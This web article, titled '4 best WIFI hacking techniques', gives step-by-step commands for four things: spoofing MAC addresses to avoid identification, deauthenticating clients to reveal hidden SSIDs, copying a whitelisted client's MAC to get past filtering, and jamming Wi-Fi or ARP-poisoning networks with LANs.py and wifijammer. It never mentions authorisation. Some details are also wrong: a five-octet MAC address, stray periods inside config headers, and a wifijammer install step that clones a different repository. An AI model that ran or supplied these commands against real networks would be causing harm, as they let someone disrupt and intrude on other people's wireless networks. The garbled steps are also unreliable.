RuCore.NET – English Version

4 best WIFI hacking techniques





1. Change and automatically generate a new MAC address when connected to Wi-Fi again

MAC (Media Access Control) – a unique identifier issued to each unit of active equipment (i.e. network adapter, router, switch, etc.) or some of their interfaces.



MAC is flashed into the equipment during manufacture and used on the network to identify the sender and recipient of the frame. It is assumed that when a new device appears on the network, the administrator will not have to specify MAC manually.

Hexoctet MAC Address Structure

MAC is unique (or at least should be) for each network interface. At the same time, the device can have several of them – for example, laptops have at least two of them: one of them has a wired controller with Ethernet connection and the other one has a Wi-Fi adapter. The addresses of a router or a router slot are unique for each port and if it’s a Wi-Fi router, the addresses of each wireless interface will be different (modern routers have 2.4 GHz and 5 GHz).

 

Why change the MAC?

MAC allows for unambiguous device identification and does not change when the operating system changes – it is flashed into a chip that provides a network interface.

Pentesters and hackers hide their MAC to prevent equipment identification during an attack. I think you understand why this might be necessary: If you use real MAC, it can be illuminated when connected to other networks. There are also means to map MAC to geographical coordinates, such as the iSniff-GPS script in the Kali kit.

 

Practice

.
So, suppose you’re using Linux. Let’s see how to change the MAC without using additional software.

Open the terminal and enter the command

$ ifconfig | grep HWaddr

If you use Ethernet, you can look at the addresses of the adapters in this way:

$ ifconfig | grep ether

To temporarily change your MAC, you must turn off the corresponding network interface. For example, for the eth1 interface, the command is this:

$ ifconfig eth1 down

Now you can form a new MAC.

$ ifconfig eth1 hw ether 00:00:00:00:11

The numbers, as you understand it, can be framed by anyone in this pattern.

Now you have to raise eth1 again.

$ ifconfig eth1 up.

And the last thing is to check if the changes have come into effect. If you look at the MAC list again, you will see that the interface has changed. However, after you reboot the computer, the old MAC value will return.

It would be nice if the MAC changed every time you connected to the network. The package NetworkManager will help us do this. Starting from version 1.4 this program supports MAC spoofing, and it has many useful options.

For each group, “wired” (ethernet) and “wireless” (wifi) MAC rules are configured separately.

Also keep in mind that a wireless adapter can be in one of two states:

    • can – set using the property wifi.scan-rand-mac-address. By default yes, i.e. during the scan an arbitrary MAC address will be set. If you choose no, this will not happen;

.

    • connected to the network – set by property wifi.cloned-mac-address, its default value is preserve.

.

The following options are available for the wired interface (ethernet.cloned-mac-address property) and the wireless interface in connection status (wifi.cloned-mac-address):

    • explicitly specified MAC – that is, you can specify your own permanent MAC;
    • permanent – use the MAC address sewn into the device (default);
    • preserve – do not change the MAC device after activation (for example, if the MAC was changed by another program, the current address will be used);

.

  • random – generate a random value for each connection.

NetworkManager is configured through the /etc/NetworkManager/NetworkManager.conf file. Optionally, you can add an additional file with the extension .conf to the directory /etc/NetworkManager/conf.d (the config can be called whatever you want). This is the second method that I recommend, because when you update NetworkManager, it usually replaces the main .conf, and if you make changes to it, they will disappear.

 

Enable automatic generation of random MAC addresses

If you want to change the MAC address every time you connect, but use the same MAC every time you connect to the same network, you need to add a couple of lines to the config. Here they are:

[connection].
ethernet.cloned-mac-address=stable
wifi.cloned-mac-address=stable

You can specify the ethernet.cloned-mac-address and wifi.cloned-mac-address properties individually or together.

You can check the values by typing ip a and for the changes to take effect you must restart NetworkManager:

$ sudo systemctl restart NetworkManager

Now connect to the wireless network and check the MAC values again.

The same addresses will be generated for the same networks. If you want the addresses to always be different, the settings are the same:

[connection].
ethernet.cloned-mac-address=random
wifi.cloned-mac-address=random

Set specific MAC

Let’s say we need to use some kind of specific MAC. To do this, we will again rule /etc/NetworkManager/conf.d/mac.conf.

To specify a MAC for the wired interface, add these strings:

[connection]. 
ethernet.cloned-mac-address=<new MAC>

To set the MAC for a wireless connection, these are the ones:

[connection]. 
wifi.cloned-mac-address=<new MAC>

Instead of <new MAC>, of course, you should write the correct MAC address. And of course, you can set up settings for both wired and wireless connections at the same time.

Note that with this method, the MAC will only change once you connect to the network. Until then, the interfaces will have their source addresses. Wi-Fi may be an exception if you have already set up spoofing, as shown above. To cancel a spoofing, add these lines to the config:

[device]. 
wifi.scan-rand-mac-address=no

And restart the service for the changes to take effect.

 

More ways to programmatically change MAC

Not only does NetworkManager know how to change MAC. In fact, there are many ways to do this using both 3rd party software and system services. So that we can track the results, change the settings on NetworkManager:

[device]. 
wifi.scan-rand-mac-address=no

Now it won’t spoof the MAC while scanning wireless networks.

Since the NetworkManager settings aren’t set to ethernet.cloned-mac-address and wifi.cloned-mac-address, the default value (preserve) will be used even if MAC has been changed by other programs.

The examples below I will run on Kali Linux and change the settings for the Wi-Fi adapter. The peculiarity of all these methods is that the changes will be lost after rebooting the system or after re-connecting the adapter.

 

MAC via iproute2

.
We will use the ip program, which is included in the iproute2 package. We will start by checking the current MAC:

$ ip link show

You will see the MAC address after link/ether. The first thing to do is to turn off the corresponding interface. I have this wlan0.

$ sudo ip link set dev wlan0 down.

Next, we go directly to spoofing the MAC. You can set any value, but remember that a network can be configured so that addresses are not issued if the MAC does not match a device from some known vendor. Therefore, it is better to take the known prefix as the first three bytes and change only the second three bytes.

To change the MAC we execute the command

$ sudo ip link set dev <interface> address <MAC>

Put your values on the line.

The last step is to return the interface to the up state:

$ sudo ip link set dev <interface> up

Well, you can write to check for changes.

$ ip link show <interface>

The value of link/ether must be the same as you set.

 

Macchanger

Another option is to use macchanger. Here it is possible to create MAC as the equipment of a certain manufacturer, and fully randomize it. In Kali, this utility is by default.

When you change the MAC, as with other methods, the device should not be used, so turn it off:

$ sudo ip link set dev <interface> down

Next I will have wlan0 as the interface, change it to mine if necessary.

To find out the MAC values, you can run a utility with the -s option:

$ sudo macchanger -s wlan0

As a result, it will output the current MAC and the one it flashes in the device (in case they don’t match), and also indicate the vendor. For example:

Current MAC: 00:c0:ca:96:cf:cb (ALFA, INC.)

Permanent MAC: 00:c0:ca:96:cf:cb (ALFA, INC.)

To change the MAC to a completely arbitrary address, there is an option -r:

$ sudo macchanger -r wlan0

At the output, a new address will be added to the two lines above.

To randomize MAC without changing the first three bytes (manufacturer prefix), there is an option -e:

$ sudo macchanger -e wlan0

So if you want to set a new MAC yourself, use -m:

$ sudo macchanger -m <MAC> wlan0

Instead of <MAC> put the desired address.

Finally, to return the original MAC, there is an option -p:

$ sudo macchanger -p wlan0

 

2. Hidden SSID Detection

Some owners of hot spots set them up so that they do not broadcast their name (ESSID). This is usually done as an additional security measure. Users will not see this network on the list of available ones, and you will need to type in the name manually to connect.

This is a weak security measure because at certain points the ESSID is still being broadcast openly.

 

Receive hidden SSID with Airodump-ng

You can catch the ESSID on the air while the client is connecting, and to do this you have to either wait until it happens naturally or force the process by disconnecting everyone from the access point. This is called deauthentication. Lost clients will start connecting again at the machine and the network name will jump out in the open.

The first thing to do is to run airodump:

$ airodump-ng <interface>

When it ignites the new network, you will see the VSSID, the length of the name and the channel used. For example, if the network is running on the first channel, you can specify it:

$ airodump-ng wlan0 --channel 1

In the same way as when intercepting a handshake, you can set the key -w and behind it – file name prefix. Capturing the handshake does not interfere with the detection of a hidden point. Next, you can either just wait for someone to connect, or deauthenticate all clients:

$ aireplay-ng -0 3 -a <BSSID> wlan0

Here -0 means mass deauthentication, 3 – number of packets sent.

The result is almost instantaneous, and you will see a string with the full name of the hidden access point.

 

3. Bypass MAC filtering by taking address from white list

.
Airodump-ng will help us to solve this problem again. Put the adapter in monitoring mode and execute such commands:

$ ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up 
$ airodump-ng wlan0

You will see a list of networks, the number of clients connected, and their MAC addresses that can be assigned to your adapter if the network is configured to filter by whitelisting.

It also happens that you can’t see clients at once at certain access points because the program hasn’t collected enough information. In this case deauthentication will help you again. If the hotspot has at least one client, you will see it immediately after reconnection. And you can intercept handshakes as well.

For deauthentication, we stop Airodump-ng and start again, only with the channel of the point of interest.

$ airodump-ng wlan0 --channel 1

After that, the helmet is deauth-packed and we see what happens:

$ aireplay-ng -0 5 -a <MAC> wlan0

After the attack, some of the previously unknown clients will be exposed. Copy the MAC of one of the legitimate users, write to your network card settings and you can perform the attack.

 

4. Muting Wi-Fi network

.
In pentesta, you may need to jam some of the access points. For this purpose, I recommend using the utility LANs. It can not only mute Wi-Fi, but also other things: spying on users, individually poisons the ARP tables of the target machine, router and if necessary – DNS server.

The jamming range is highly dependent on the power of the adapter, but the script has settings that allow it to jam all or only one client. Here everything is simple: we download and install dependencies and download the script itself.

$ sudo apt install -y python-nfqueue python-scapy python-twisted nbtscan

$ git clone https://github.com/DanMcInerney/LANs.py.git
$ cd LANs.py/

Now you can run our script to start jamming.

$ python lans.py -u -p

The -u and -p keys mean active target detection for ARP spoofing and output of all interesting unencrypted data they send or request. The -ip options are not available here, so an ARP scan of the network will be performed and its results will be compared to a live “indecipherable” capture. The result will be a list of all clients in the network.

Press Ctrl + C to stop the search when you build a network map and see the lists of connected clients. For the same purposes, by the way, you can successfully use Nmap.

The jamming dot option will look like this:

$ python lans.py --jam --accesspoint <MAC router> -s <MAC to skip>

Here:

  • -jam – muffle all or some 2.4 GHz wireless points and clients within reach; if necessary, additional arguments can be used (below);
  • -s – so you can specify a MAC that will not be deactivated;
  • -accesspoint – here you can enter the MAC of the specific access point that will serve as the target.

Muting all Wi-Fi networks will look like this:

$ python lans.py --jam.

Jamming only one access point:

$ python lans.py --jam --accesspoint <BSSID>

Here you can also specify some additional options:

  • -ch – limit jamming to one channel;
  • -directedonly – do not send deauthentication packets to access point broadcast addresses, but only to pairs from client and hotspot;
  • -accesspoint – so you can specify a specific access point as a target.

 

Still Effective Wi-Fi Muffler Script

To mute Wi-Fi, it may be convenient to use the utility wifijammer. It is extremely easy to use, so there is almost nothing to discuss here: without parameters, it will simply muffle anything within the range of the adapter. To avoid hitting your own, you can exclude some MAC addresses with the option -s.

Install the wifijammer:

$ sudo apt install -y python-nfqueue python-scapy python-twisted nbtscan
$ git clone https://github.com/DanMcInerney/LANs.py.git
$ cd LANs.py/

And let’s go:

$ sudo python2 wifijammer.py -s <MAC for exception>

That’s it!


30 Views



Spelling error report

The following text will be sent to our editors: